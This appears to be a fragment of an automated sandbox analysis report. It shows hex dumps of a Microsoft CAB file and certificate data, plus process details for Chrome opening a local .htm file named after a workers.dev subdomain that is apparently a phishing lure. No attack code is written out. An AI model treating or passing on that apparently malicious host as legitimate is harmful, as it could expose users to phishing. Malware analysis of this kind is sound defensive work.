                                                                2024-08-27 18:12:08 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                2024-08-27 18:12:08 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:14:11:08
                                                                Start date:27/08/2024
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htm"
                                                                Imagebase:0x7ff715980000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:2
                                                                Start time:14:11:13
                                                                Start date:27/08/2024
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2108,i,18282856199490387947,11030613626168180458,262144 /prefetch:8
                                                                Imagebase:0x7ff715980000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                No disassembly